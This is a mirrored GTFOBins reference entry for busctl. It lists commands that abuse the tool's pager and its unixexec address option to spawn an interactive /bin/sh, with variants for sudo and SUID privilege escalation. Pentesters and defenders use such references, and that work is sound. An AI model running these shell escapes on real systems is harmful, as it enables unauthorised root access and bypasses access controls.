1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-01-08 08:31:32 +01:00
GTFOBins.github.io/_gtfobins/busctl.md
2025-10-14 23:18:14 -07:00

540 B

functions
shell sudo suid
description code
This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply. busctl --show-machine !/bin/sh
code
busctl --address=unixexec:path=/bin/sh,argv1=-c,argv2='/bin/sh -i 0<&2 1>&2'
code
sudo busctl --address=unixexec:path=/bin/sh,argv1=-c,argv2='/bin/sh -i 0<&2 1>&2'
code
./busctl --address=unixexec:path=/bin/sh,argv1=-pc,argv2='/bin/sh -p -i 0<&2 1>&2'